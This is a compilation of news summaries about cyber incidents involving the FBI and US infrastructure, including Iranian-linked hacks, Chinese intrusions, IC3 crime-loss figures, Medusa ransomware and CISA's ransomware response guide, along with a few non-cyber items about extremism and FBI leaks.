U.S. Investigates Iranian-Linked Cyberattacks on Fuel Monitoring Systems U.S. cybersecurity officials are probing a series of breaches targeting automatic tank gauge (ATG) systems used to monitor fuel levels at gas stations with early indications pointing to Iranian-linked hackers. The attacks exploited poorly secured systems left exposed online without password protection, allowing threat actors to access and manipulate display readings in some cases. However, investigators confirmed that actual fuel quantities in storage tanks remained unaffected, and no physical damage or leaks have been reported. While the immediate impact appears limited, experts warn that unauthorized access to ATG systems could enable attackers to mask real fuel leaks or disrupt monitoring operations, raising concerns about vulnerabilities in U.S. critical infrastructure, particularly within the oil and gas sector. The Cybersecurity and Infrastructure Security Agency (CISA) and the FBI have not publicly attributed the attacks, though U.S. officials suspect Iranian involvement based on past incidents targeting similar systems, including water utilities and energy networks. The incident underscores growing risks to internet-connected industrial systems, which researchers have long flagged as poorly secured and prime targets for cyber threats. Iran-linked groups have previously been linked to disruptions of U.S. companies and government systems, with recent activity showing increased sophistication amid heightened geopolitical tensions involving Iran, the U.S., and Israel. The attacks align with a broader pattern of escalating cyber operations, including phishing campaigns, data leaks, and infrastructure-focused disruptions.

FBI Warns of Surging Cyber-Enabled Cargo Theft, Losses Hit $725 Million in 2025 The FBI has issued a public alert warning of a sharp rise in cyber-enabled strategic cargo theft, with threat actors impersonating brokers and carriers to hijack and resell high-value shipments. In 2025, losses in the U.S. and Canada reached nearly $725 million a 60% year-over-year increase while confirmed incidents rose 18%, with the average theft value climbing 36% to $273,990. Attackers gain access to logistics systems through phishing, spoofed emails, and compromised carrier accounts, then manipulate load boards by posting fraudulent listings or altering legitimate shipments. Once inside, they hijack identities, double-broker loads, and modify critical documents such as bills of lading and delivery addresses to reroute cargo. Some schemes culminate in ransom demands after shipments vanish. The FBI detailed a multi-step operation, where threat actors first deploy remote access tools via malicious links, then flood load boards with fake listings while bidding on real shipments using stolen credentials. They sustain deception by altering carrier contact and insurance details, delaying detection until goods are stolen and resold. Key warning signs include unauthorized shipment notifications, spoofed emails with slight domain variations, and requests to download documents from suspicious links. Compromised accounts may show unusual mailbox rules, such as auto-forwarding or hidden folders, while attackers often use short-lived VoIP numbers for communication. The alert underscores the growing sophistication of cyber-enabled cargo theft, targeting transportation and logistics sectors with high-value, selective attacks.

Agoda Denies Data Breach as Cybercriminals Claim Theft of 82 Million Records Asia-based travel booking platform Agoda has refuted claims of a data breach after cybercriminals alleged the theft of 82 million user records. An Agoda spokesperson stated that internal investigations confirmed the leaked data did not originate from its systems. Researchers at Cybernews analyzed a sample of 23 records provided by the attackers, which included sensitive details such as full names, identity card numbers, phone numbers, email addresses, and hotel addresses primarily linked to Malaysian users. Notably, the sample lacked reservation dates, an unusual omission that raised questions about the data’s origin. Despite this, the researchers verified the legitimacy of the exposed information. The incident follows a recent confirmation by Agoda’s parent company, Booking Holdings, of a separate breach affecting Booking.com users. That attack exposed names, phone numbers, email addresses, and reservation details, leading to a surge in reservation hijacking scams across North America, Europe, and the UK. The timing of the two incidents has heightened concerns about cybersecurity risks in the travel industry.

FBI Reports Record $20.87 Billion in Cybercrime Losses for 2025, Driven by AI-Enhanced Scams The FBI’s 2025 Internet Crime Report revealed a historic surge in cybercrime, with reported losses reaching $20.87 billion the first time losses exceeded $20 billion. Complaints submitted to the Internet Crime Complaint Center (IC3) surpassed one million, a 17% increase from 2024. Top Threats & Financial Impact Phishing remained the most reported crime (191,561 complaints), but investment scams caused the highest losses ($8.6 billion), followed by business email compromise (BEC) and tech support scams. Cyber-enabled fraud using digital tools to execute traditional scams accounted for 45% of complaints but 85% of financial losses. Meanwhile, classic cyber threats like ransomware and data breaches made up 75% of reported incidents. AI’s Growing Role in Cybercrime For the first time, the IC3 included an AI-focused section, highlighting its use in 22,364 complaints and $893 million in losses though the FBI cautioned that actual figures may be higher due to underreporting. Key AI-driven schemes included: - BEC attacks (high financial losses, despite fewer AI-specific reports) - Romance/confidence scams (fake profiles, voice cloning) - Employment fraud (deepfake interviews, forged documents) - Investment cons (AI-generated videos impersonating public figures) Complaints for these scams spiked significantly from 2023 to 2025, with corresponding increases in financial losses. Government Impersonation Scams Surge One notable outlier was government impersonation scams, which saw a 128% increase in complaints (from 14,190 in 2023 to 32,424 in 2025). The FBI previously warned of AI-generated voice and text messages mimicking senior U.S. officials to target government personnel and contacts. The report underscores how cybercriminals are leveraging AI to refine traditional scams, making them more profitable and harder to detect. While AI-related losses remain a fraction of the total, their rapid growth signals a shifting threat landscape.

Pro-Iranian Hackers Leak Alleged Private Documents of FBI Official Kash Patel A pro-Iranian hacking group, Handala Hack, has released purported private documents and images of Kash Patel, a director at the U.S. Federal Bureau of Investigation (FBI). The leak was confirmed by Department of Justice (DOJ) sources to Fox News, though officials have not verified the authenticity of the circulating photos. The group published a statement on its newly launched website, declaring the incident as proof of the "collapse of American security legends." This retaliation comes just one week after the DOJ seized two web domains linked to Handala Hack as part of a broader operation targeting Iranian-backed cyberattacks, transnational repression, and psychological operations. Handala Hack framed the breach as a direct response to what it called the FBI’s "ridiculous spectacle" of recent countermeasures. The group claims its team penetrated the FBI’s "impenetrable" systems within hours, making Patel’s emails, conversations, documents, and classified files publicly available for download. The hackers asserted the attack would be "etched forever in memory." The incident underscores escalating cyber tensions between Iranian-linked threat actors and U.S. law enforcement, following recent disruptions of the group’s infrastructure.

FBI Network Breach Targets Surveillance Systems Hackers have reportedly compromised an FBI network used to manage wiretaps and foreign intelligence surveillance warrants, according to a CNN report citing an anonymous source. The breach was confirmed by an FBI spokesperson, who stated that the bureau detected and addressed "suspicious activities" on its systems, though no further details were provided. The incident marks the latest in a string of high-profile cyberattacks on U.S. government agencies and corporations. Last year, Chinese hackers infiltrated the U.S. Treasury and the National Nuclear Security Administration, while Russian operatives stole sealed court records. Separately, a Chinese state-linked group, Salt Typhoon, breached at least 200 U.S. companies, including major telecommunications providers like AT&T, Verizon, Lumen, Charter Communications, and Windstream. The FBI has not disclosed the extent of the breach or the identity of the attackers, but the incident underscores ongoing cybersecurity threats to critical U.S. infrastructure.

Iran-Linked Hacking Group Claims Breach of FBI Drones Ahead of 2026 World Cup An Iran-affiliated hacking group, Handala, has claimed it breached FBI-operated first-person view (FPV) drones, gaining access to sensitive data collected over months, including images and intelligence from counterterrorism operations. According to the SITE Intelligence Group, the group alleged the drones were equipped with facial recognition and license plate-reading technology. In a statement, Handala issued a veiled threat tied to the 2026 FIFA World Cup, warning, “Better tighten your World Cup security… FPVs are everywhere; you never know when one might end up right in your team’s bus.” The FBI has confirmed drones will be deployed for security at World Cup venues, though unauthorized flights are prohibited near stadiums and fan zones. The tournament’s matches began on June 11. SITE cast doubt on Handala’s claims, noting that at least one video presented as evidence appeared to be unrelated 2024 footage of U.S. police drone software used after tornado damage. The group has a history of making unverified assertions, including a March claim that it hacked an FBI official’s email account. The incident follows broader warnings from U.S. officials about Iranian cyber threats, particularly after recent U.S. and Israeli strikes on Tehran. The State Department has offered a $10 million reward for information leading to the identification of Handala members.

FBI Confirms Major Cyber Incident Linked to Chinese Hackers The FBI recently notified Congress of a significant cyber intrusion under the Federal Information Security Modernization Act (FISMA), marking a rare declaration of a "major incident" involving its own systems. The breach, attributed to sophisticated hackers likely backed by China, compromised sensitive data, including legal surveillance returns such as pen register and trap-and-trace records and personally identifiable information tied to FBI investigations. The attack exploited a commercial internet service provider’s vendor infrastructure, demonstrating advanced tactics. While the exact trigger for the FISMA designation remains unclear, such incidents typically involve the exfiltration of data posing acute risks to national security, foreign relations, or public confidence. Former FBI cyber division official Cynthia Kaiser noted that the bureau has not reported a major incident of this scale since at least 2020, underscoring the severity of the breach. Pen register and trap-and-trace tools, which track call and internet activity without capturing content, are highly valuable to foreign intelligence services, as they could reveal FBI surveillance targets. The incident appears unrelated to a recent Iranian-linked compromise of FBI Director Kash Patel’s emails but aligns with China’s escalating cyber operations against U.S. national security systems. Sen. Mark Warner (D-Va.), chair of the Senate Intelligence Committee, described the breach as a stark reminder of China’s growing cyber aggression. Under FISMA, the declaration should trigger an interagency response, though it remains unclear whether containment efforts have been successful. The White House convened a meeting in early March with officials from the FBI, NSA, and CISA to address the breach. Chinese hackers have increasingly targeted commercial communications providers as entry points into federal networks, with recent campaigns such as those by groups like Volt Typhoon and Salt Typhoon compromising critical infrastructure and telecommunications providers, including the theft of call records and FBI wiretap data. While U.S. officials believe the FBI acted swiftly to mitigate the incident, the breach highlights persistent vulnerabilities in even the most secure systems. The attack serves as a reminder of the relentless threat posed by state-backed cyber adversaries.

FBI Investigates Sophisticated Breach of Surveillance System Holding Sensitive Law Enforcement Data The FBI, alongside agencies including CISA and the NSA, is probing a cyber intrusion into the Digital Collection System Network (DCSNet), an unclassified but highly sensitive surveillance platform used to store law enforcement data. The breach was first detected on February 17, with the FBI notifying Congress this week after identifying unusual activity linked to the system. DCSNet contains legal process returns such as pen register and trap-and-trace data along with personally identifiable information (PII) on subjects of FBI investigations. Pen registers, which log dialed phone numbers, were among the compromised records. The attacker employed advanced techniques, including leveraging a commercial ISP’s infrastructure, to bypass security controls, a tactic increasingly used by nation-state threat actors. While the FBI has not disclosed the attacker’s identity, the incident aligns with recent campaigns by Chinese and Russian hacking groups, which have targeted U.S. government and telecom networks via ISP compromises. Notably, China-linked group Salt Typhoon breached major telecom providers including Verizon, AT&T, and Lumen Technologies in 2024, raising concerns about supply-chain infiltration. The breach occurs amid heightened cyber tensions, including Iran-backed hacking activity following U.S.-Israeli airstrikes on February 28. However, most Iranian cyber operations have focused on Middle Eastern and European targets rather than the U.S. The investigation also unfolds against a backdrop of staffing cuts at key cybersecurity agencies, with the FBI dismissing nearly two dozen employees many in cyber and counterintelligence roles just days before the Iran strikes. Security experts warn the breach underscores the risks of institutional knowledge loss. Damon Small of Xcape described the incident as a "catastrophic vulnerability window" created by the departure of experienced defenders, leaving critical systems exposed. The FBI has not released further details, but the involvement of the White House, NSA, and Justice Department signals the severity of the compromise.

Former SSA Chief Data Officer Warns of Massive Social Security Data Breach A whistleblower has raised alarms over a potential national security disaster involving the exposure of sensitive Social Security data for every American with or who ever had a Social Security number (SSN). Chuck Borges, the former chief data officer of the Social Security Administration (SSA), resigned in August and filed a complaint alleging that employees of the Department of Government Efficiency (DOGE) uploaded a copy of the SSA’s database to an unsecured cloud environment. According to Borges, the breach if confirmed could leave personal data, including names, SSNs, and addresses, vulnerable to fraud and exploitation, with long-term consequences for millions of Americans. He has called for a congressional investigation into the alleged mismanagement, framing the incident as a severe threat to national security. The SSA has not publicly confirmed the breach, but the whistleblower’s claims highlight critical vulnerabilities in government data handling. If verified, the exposure could have far-reaching implications for identity theft, financial fraud, and cybersecurity risks across the U.S. The incident underscores ongoing concerns about federal agencies’ ability to safeguard sensitive citizen data.

DHS Warns of Escalating Cyber Threats from Iran-Backed Hackers Amid Rising Tensions The U.S. Department of Homeland Security (DHS) issued a National Terrorism Advisory System (NTAS) bulletin on Sunday, warning of heightened cyberattack risks from Iran-backed hacking groups and pro-Iranian hacktivists following recent geopolitical escalations. The advisory highlights a "heightened threat environment" in the U.S., with low-level cyberattacks likely targeting vulnerable networks. The DHS cautioned that violent extremists within the U.S. could mobilize in response to the Israel-Iran conflict, particularly if Iranian leadership issues a religious ruling calling for retaliatory violence. The bulletin also noted that anti-Semitic and anti-Israel sentiment has already motivated recent domestic attacks, raising concerns about further violence. The warning follows a pattern of Iranian state-affiliated hackers and hacktivists exploiting poorly secured U.S. networks. In October, authorities in the U.S., Canada, and Australia reported that Iranian hackers were acting as initial access brokers, breaching organizations in healthcare, government, IT, engineering, and energy sectors through brute-force attacks, password spraying, and MFA fatigue (push bombing). A separate August advisory from CISA, the FBI, and the Defense Department’s Cyber Crime Center (DC3) identified Br0k3r (also known as Pioneer Kitten, Fox Kitten, and other aliases) as a state-sponsored Iranian threat group involved in selling access to compromised networks to ransomware affiliates in exchange for a share of profits. While the DHS did not explicitly link the NTAS bulletin to recent events, the warning comes after U.S. strikes on Iranian nuclear facilities—including Fordow, Natanz, and Isfahan—on Saturday, just over a week after Israel targeted Iranian nuclear and military sites on June 13. Iran’s Foreign Minister, Abbas Araghchi, responded by warning of "everlasting consequences" and asserting Iran’s right to defend its sovereignty.

Compromised FBI.gov email accounts are being sold on dark web channels (e.g., Telegram, Signal) for as low as $40, granting buyers full SMTP/POP3/IMAP access. These credentials enable attackers to impersonate law enforcement, submit fraudulent emergency data requests to tech companies (bypassing legal processes like subpoenas), and extract sensitive user data (IPs, emails, phone numbers). Criminals also exploit these accounts to distribute malware campaigns, access government-restricted intelligence tools (e.g., Shodan, Intelligence X), and infiltrate law enforcement portals. The breach stems from credential stuffing, infostealer malware, and targeted phishing, exploiting human/technical vulnerabilities rather than direct system hacking. The commoditization of institutional trust amplifies risks of large-scale fraud, unauthorized data disclosure, and erosion of public confidence in government communications. Accounts from domains like .gov bypass security filters, increasing phishing success rates and potential for supply-chain attacks on private sector entities relying on government verification.

Cybercriminals Escalate Threats with Physical Violence in Extortion Schemes Cyberattacks are increasingly accompanied by threats of physical harm, marking a dangerous evolution in ransomware and extortion tactics. According to FBI data, incidents involving physical threats in the U.S. more than doubled last year, with similar trends reported in Europe, where over 18 cases were documented. Attackers are leveraging stolen personal data such as home addresses, social security numbers, and workplace details to intimidate victims. In one instance, hospital staff received harassing calls from hackers who named nurses individually and disclosed their private information, creating a climate of fear. Some criminals go further, hiring third parties to carry out threats or even commit violence, a tactic known as "violence-as-a-service." The cryptocurrency sector has become a hotspot for such attacks, with hackers targeting high-profile investors who flaunt their wealth online. Last year, French police rescued the father of a cryptocurrency millionaire who had been kidnapped, while another victim reportedly had a finger severed as part of an extortion attempt. Many perpetrators are young, with FBI profiles indicating ages between 17 and 25. Ransomware gangs, some state-sponsored by nations like Russia, China, Iran, and North Korea, are driving this shift. A Semperis report found that in 40% of global ransomware attacks in 2025, criminals resorted to physical threats. The financial toll is staggering U.S. organizations lost $20.8 billion to cybercrime last year, up from $16.6 billion in 2024. Experts warn the trend will persist as long as victims continue to pay ransoms. In one case, a cybersecurity negotiator received a threatening package at his home, underscoring the personal risks faced by those involved in ransom negotiations. The rise of "In Real Life Com," a network of online-linked criminals, has further normalized the use of real-world violence in cyber extortion schemes.

FBI Warns Seniors as Cyber Scams Surge, Losses Hit $7.7 Billion in 2025 In observance of National Senior Fraud Awareness Day on May 15, the FBI issued a stark warning about the escalating threat of cyber scams targeting Americans over 60. According to the FBI’s Internet Crime Complaint Center (IC3), seniors filed over 200,000 fraud complaints in 2025 a 37% increase from the previous year with financial losses soaring to $7.7 billion, up 59% from 2024. FBI Special Agent Rebecca Keithley attributed the targeting of older adults to several factors: accumulated savings, heightened trust in unsolicited communications, and vulnerability to loneliness, which scammers exploit to establish fraudulent relationships. Common schemes include impersonation of relatives in financial distress, fake tech support offers, romance scams, and fraudulent charity solicitations. The FBI highlighted key red flags, such as demands for secrecy, urgency, requests for wire transfers, or payment via gift cards. Special Agent Ron Miller emphasized that ignoring unsolicited calls and messages is the most effective defense, as prolonged engagement increases the likelihood of falling victim. The warning underscores the growing sophistication and financial impact of scams disproportionately affecting older populations.

AI-Driven Cybercrime Losses Hit Record $20.87 Billion in 2025, FBI Reports Cybercrime losses surged to an unprecedented $20.87 billion in 2025, with artificial intelligence playing an increasingly central role in fraud schemes, according to the FBI’s Internet Crime Complaint Center (IC3) report. For the first time, the report included a dedicated section on AI, underscoring its growing use by criminal networks to enhance the scale and sophistication of attacks. AI-powered fraud accounted for 22,364 complaints and $893 million in reported losses, though authorities believe the true figure is higher due to underreporting and victims’ unawareness of AI involvement. Cyber-enabled fraud crimes leveraging technology to execute traditional scams dominated the landscape, representing 45% of complaints but a staggering 85% of total financial losses. The total number of cybercrime complaints exceeded one million in 2025, a 17% increase from the previous year. Phishing remained the most reported offense, followed by extortion and investment scams. However, investment fraud caused the greatest financial damage, totaling $8.6 billion, while business email compromise (BEC) and tech support scams also contributed heavily to losses. While ransomware and data breaches accounted for 75% of reported technical attacks, the majority of cybercrime activity centered on digitally enabled fraud rather than purely technical exploits. AI-driven tactics included deepfake voices, cloned identities, and fabricated video content, used in BEC, romance scams, employment fraud, and investment schemes. A particularly alarming trend was the 128% surge in government impersonation scams, rising from 14,190 reports in 2023 to 32,424 in 2025. The FBI warned that AI-generated messages impersonating officials including voice and text communications have been used to deceive victims into compromising personal accounts. Despite their rapid growth, these scams received limited attention in AI-specific reporting. The report highlighted the evolving nature of cyber threats, driven by the broader adoption of emerging technologies, signaling a shift toward more adaptive and deceptive criminal tactics.

Pro-Iranian Hackers Claim Breach of FBI Director’s Personal Account A pro-Iranian hacking group, Handala, announced on Friday that it had compromised an account belonging to FBI Director Kash Patel, releasing decades-old personal photographs, a resume, and other documents online. The group, which has ties to Iran and Palestine, posted a statement alongside the materials, taunting Patel and declaring him among their "successfully hacked victims." The leaked files including images of Patel with a vintage sports car and a cigar appear to date back over a decade, primarily involving personal travel and business records. The FBI confirmed awareness of the incident, stating that the exposed data was historical and contained no classified or government information. The bureau added that it had taken steps to mitigate risks from the breach. The timing of the hack remains unclear, though reports from December 2024 indicated Patel had been previously warned by the FBI about Iranian targeting efforts. Handala, which has escalated its cyber operations in recent months, recently claimed responsibility for disrupting systems at Stryker, a Michigan-based medical technology firm, in retaliation for alleged U.S. airstrikes linked to Iranian civilian casualties. The group has been a persistent threat, with the U.S. Justice Department seizing four web domains tied to its operations last week as part of efforts to counter Iranian cyber campaigns. The Trump administration has also offered a $10 million reward for information leading to the identification of Handala members. The incident underscores the growing role of proxy hacking groups in Iran’s broader cyber conflict with Western targets.

In the film 'The Order,' the FBI investigates the proliferation of a radical ideology that leads to significant acts of domestic terrorism, including armed revolt and assassination. Based on historical events, the narrative identifies the influence of 'The Turner Diaries' in inspiring Timothy McVeigh's Oklahoma City bombing. Given the profound effect on national security and the potential for sparking wide-ranging violence, the involvement of law enforcement to thwart such threats is imperative.

An FBI informant, Joshua Caleb Sutter, linked to extreme right-wing and neo-Nazi movements disseminated propaganda contributing to the rise of violent groups and networks engaged in child abuse. His actions, along with other radical elements, have led to the proliferation of child sexual abuse material (CSAM) and potentially influenced ultraviolent terrorist acts. Despite Sutter's past as an informant and implication in serious crimes, the FBI's stance and handling of his case remain unclear, raising concerns over informant accountability and the extent of malfeasance overlooked in intelligence operations.

Texas Hit by $70.4 Million in Personal Data Breach Losses in 2024, FBI Reports Texas residents lost over $70.4 million in 2024 due to account takeovers and identity fraud, a sharp increase driven by criminals exploiting stolen personal data. According to an FBI Dallas Facebook post on March 9, the losses stem from breaches of bank accounts, investment portfolios, email systems, devices, and cryptocurrency wallets. The figure reflects a growing trend of fraudsters bypassing traditional identity theft to directly drain financial assets. The $70.4 million total marks a significant rise from previous years, with Texas reporting $37 million in 2020, $42 million in 2021, $46 million in 2022, and $31 million in 2023. These losses contribute to the FBI’s Internet Crime Complaint Center (IC3) national tally, which recorded over $16 billion in U.S. cybercrime losses in 2024. Texas ranks among the states with the highest financial impacts, with extortion, personal data breaches, and phishing as the most common complaint types. Criminals leverage stolen data such as Social Security numbers, birthdates, and account credentials to reset passwords, bypass security measures, and siphon funds across linked accounts. A single breach can trigger cascading theft, amplifying financial damage. The IC3’s 2024 Internet Crime Report highlights the scale of these attacks, with personal data breaches generating some of the largest losses nationwide. In response, law enforcement is pushing for faster victim reporting and stronger account protections to disrupt fraudulent transactions before funds are irretrievable. Texas businesses facing breaches must comply with state reporting laws, notifying affected individuals and regulators under guidelines set by the Texas Attorney General. Early reporting aids recovery efforts and helps authorities track emerging fraud patterns. The FBI continues to urge victims to alert financial institutions, file complaints via IC3, and contact local law enforcement, emphasizing that timely reporting strengthens investigations and supports broader enforcement actions.

FBI’s Epstein Investigation Files Compromised in 2023 Cyber Breach by Foreign Hacker In February 2023, a foreign hacker infiltrated a server at the FBI’s New York field office, accessing files related to the bureau’s investigation of the late sex offender Jeffrey Epstein. The breach, first reported by Reuters and CNN on February 17, 2024, occurred when a server in the FBI’s child exploitation forensic lab was left vulnerable due to procedural errors by Special Agent Aaron Spivack. The intrusion was discovered on February 13, 2023, after Spivack found a text file warning of the compromise. Internal documents revealed the hacker had searched through Epstein-related files, though it remains unclear whether data was exfiltrated or which specific records were accessed. The FBI described the incident as an “isolated” cyber incident, stating it had restricted access and remediated the network, though its investigation is ongoing. A source familiar with the breach indicated the hacker was likely a cybercriminal rather than a state actor, though the incident highlights the intelligence value of Epstein’s files. The release of U.S. Justice Department documents in recent years has exposed Epstein’s ties to high-profile figures, sparking global investigations. Security experts, including Georgia Tech’s Jon Lindsay, have noted the potential for foreign intelligence services to exploit such material for kompromat (compromising information). The hacker reportedly expressed shock upon encountering child abuse imagery on the server and threatened to report the owner to law enforcement. FBI officials defused the situation by convincing the hacker of their identity via a video call, during which they displayed law enforcement credentials. The hacker’s identity, origin, and motives remain unknown, as does whether any data was retained or disseminated. The breach stemmed from Spivack’s attempt to navigate the FBI’s complex digital evidence protocols, according to internal documents. Spivack, who has been involved in the Epstein investigation, denied responsibility, citing conflicting bureau policies and inadequate IT guidance. The outcome of the FBI’s internal review is unclear. Many of the Justice Department’s Epstein-related documents remain heavily redacted or withheld, with the Trump administration citing protections for victims and ongoing investigations. The incident underscores the persistent risks of cyber intrusions targeting sensitive law enforcement data.

FBI Reports Ransomware Surge in Critical Infrastructure, Highlights Persistent Threats In 2022, ransomware attacks continued to plague organizations, with phishing, remote desktop protocol (RDP) exploitation, and software vulnerabilities remaining the primary initial infection vectors, according to the FBI. Threat actors increasingly relied on extortion tactics threatening to leak stolen data to pressure victims into paying ransoms. Of the 2,385 ransomware incidents reported to the FBI last year, 870 targeted critical infrastructure sectors, with the healthcare and public health sector bearing the brunt of attacks. Collectively, these infections resulted in adjusted losses exceeding $34 million. However, the FBI acknowledged that the true scale of ransomware activity remains underreported, as many incidents go unreported to law enforcement. Extortion both ransomware-related and other forms ranked as the fourth-highest cybercrime type reported to the FBI in 2022, though overall extortion complaints remained flat compared to 2021 and down nearly 50% from a 2020 peak. Security leaders and government officials emphasized the need for bipartisan cooperation on cyber resilience, stressing that national security priorities should transcend partisan divides, particularly as the U.S. approaches the presidential election. Meanwhile, experts warned that third-party vendors must prioritize secure development practices over speed to market to mitigate supply chain risks. The report underscores the ongoing threat ransomware poses to critical infrastructure, with healthcare, public health, and other essential services facing disproportionate targeting.

CISA and Partners Release Updated #StopRansomware Guide to Strengthen Incident Response In May 2023, the Cybersecurity and Infrastructure Security Agency (CISA), alongside the FBI, NSA, and the Multi-State Information Sharing and Analysis Center (MS-ISAC), released an updated #StopRansomware Guide to standardize ransomware response protocols. The guide outlines a structured approach for organizations to detect, contain, eradicate, and recover from ransomware attacks, emphasizing coordinated action to minimize damage. The response process begins with detection and analysis, where impacted systems must be isolated immediately either by disconnecting networks at the switch level or physically unplugging devices. For cloud environments, snapshots of volumes should be taken for forensic review. Organizations are advised to use out-of-band communication (e.g., phone calls) to avoid tipping off attackers, who may monitor internal activity to escalate attacks. If isolation isn’t feasible, powering down devices is recommended, though this risks losing volatile memory evidence. Critical systems such as those tied to health, safety, or revenue should be prioritized for restoration, while unaffected systems are deprioritized to streamline recovery. Security teams are urged to examine logs for precursor malware (e.g., Bumblebee, QakBot, or Cobalt Strike) and signs of data exfiltration, as ransomware often follows earlier compromises. Threat hunting should focus on anomalous activity, including unauthorized Active Directory accounts, suspicious VPN logins, and misuse of built-in Windows tools (e.g., vssadmin.exe, PsExec) to inhibit recovery. Reporting and notification are critical, with organizations directed to engage internal stakeholders (IT, leadership, cyber insurers) and external agencies like CISA, the FBI, or the U.S. Secret Service. If a data breach occurs, legal and communications teams must follow incident response plans to manage disclosures. Containment and eradication involve capturing system images, memory dumps, and malware samples for analysis. Trusted guidance (e.g., from CISA or security vendors) should be followed to disable ransomware binaries and remove associated registry entries. Breaches often involve credential theft, requiring measures like disabling remote access and resetting passwords. Forensic analysis should identify persistence mechanisms, such as rogue accounts or backdoors, before systems are rebuilt using clean images or infrastructure-as-code templates. Recovery prioritizes reconnecting systems from offline backups while preventing reinfection. Post-incident, organizations are encouraged to document lessons learned and share indicators of compromise with CISA or sector-specific ISACs to bolster collective defense. The guide underscores that ransomware incidents may signal deeper compromises, necessitating thorough investigation to prevent recurrence.

Edward Kelley, a Tennessee man pardoned for his role in the Jan. 6, 2021, U.S. Capitol assault, was sentenced to life in prison for plotting to attack FBI agents and seeking to incite a 'civil war.' Kelley created a 'kill list' of FBI agents and distributed it to a co-conspirator. He was convicted of conspiracy charges and viewed the FBI as the enemy, targeting them for assassination. The Justice Department stated that Kelley identified 36 law enforcement personnel to target, including names, titles, and cell phone numbers.

Medusa Ransomware Surges, Targeting Critical Infrastructure with Double Extortion Tactics The Medusa ransomware operation, tracked by Symantec as Spearwing, has claimed nearly 400 victims since its emergence in January 2023, with attacks rising 42% between 2023 and 2024. In the first two months of 2025 alone, the group has attributed over 40 incidents, signaling an aggressive expansion amid the disruption of other major ransomware-as-a-service (RaaS) players like LockBit and BlackCat. Medusa employs double extortion, stealing sensitive data before encrypting networks to pressure victims into paying ransoms ranging from $100,000 to $15 million. Targets span healthcare, financial services, government, education, legal, and manufacturing sectors many within critical infrastructure. If victims refuse to pay, the group threatens to leak stolen data via its dedicated leak site. ### Attack Methods & Tools Medusa’s intrusion chains often begin with exploiting known vulnerabilities in public-facing applications, particularly Microsoft Exchange Server, or through initial access brokers. Once inside, attackers deploy remote management tools like SimpleHelp, AnyDesk, and MeshAgent for persistence, alongside the Bring Your Own Vulnerable Driver (BYOVD) technique to disable antivirus software using KillAV a tactic previously seen in BlackCat attacks. Other tools in Medusa’s arsenal include: - PDQ Deploy for lateral movement and payload delivery - Navicat for database access - RoboCopy and Rclone for data exfiltration - Advanced IP Scanner and SoftPerfect Network Scanner for reconnaissance - Ligolo and Cloudflared for command-and-control (C2) evasion The group also employs living-off-the-land (LotL) techniques, such as PowerShell commands (Base64-encoded to avoid detection) and Mimikatz for credential theft, alongside legitimate remote access tools like ConnectWise and PsExec to move undetected. ### Evasion & Triple Extortion Risks Medusa actors take steps to evade detection, including deleting PowerShell command histories and terminating endpoint detection and response (EDR) tools. In at least one case, a victim who paid the ransom was later contacted by a separate Medusa affiliate, who claimed the original negotiator had stolen the funds and demanded an additional payment suggesting a potential triple extortion scheme. ### CISA Advisory & Historical Context A joint advisory from CISA, the FBI, and MS-ISAC, released on March 12, 2025, revealed that Medusa has compromised over 300 critical infrastructure victims as of December 2024. The group, unrelated to MedusaLocker or the Medusa mobile malware, first appeared in June 2021 as a closed ransomware variant before shifting to an affiliate-based model. While affiliates execute attacks, core developers retain control over ransom negotiations. Recent campaigns have exploited vulnerabilities in ConnectWise ScreenConnect (CVE-2024-1709) and Fortinet EMS (CVE-2023-48788). Despite the RaaS landscape’s volatility with new groups like Anubis, LCRYX, and Xelera emerging Medusa has established itself as a persistent threat, ranking among the top ransomware actors in late 2024.

The FBI faced a high-profile breach involving unauthorized leaks of sensitive information tied to its investigation into Hillary Clinton’s private email server. Former FBI Director James Comey was indicted for allegedly authorizing Daniel Richman, a Columbia University law professor and former federal prosecutor, to act as an anonymous media source. The leak, investigated under Operation Arctic Haze, involved classified details appearing in a 2017 New York Times article, though no charges were filed against Richman or Comey for the leak itself. The incident stemmed from Comey’s 2020 Senate testimony, where he denied authorizing any FBI personnel to leak investigation details—contradicted by later revelations. While no direct data theft or financial loss occurred, the breach compromised the FBI’s operational integrity, eroded public trust, and triggered legal repercussions for Comey, including charges of false statements and obstruction. The case also highlighted political interference allegations, with Comey’s legal team arguing the prosecution was motivated by former President Trump’s personal vendetta. The reputational damage extended to the FBI’s credibility in handling politically sensitive investigations, reinforcing perceptions of institutional vulnerability to internal leaks and external manipulation.

Data on Pastebin was exposed by the infamous black hat hacker CyberZeist, who gained access to the FBI website FBI.gov. Account information, including names, SHA1 encrypted passwords, SHA1 salts, and emails, are contained in leaked documents. While professionals at the FBI worked to resolve the issue, the expert provided more details about the attack. The website administrators appear to have made some unfortunate mistakes. For instance, they left backup files on the same server, which allowed hackers to access them even if they chose not to publish them right away.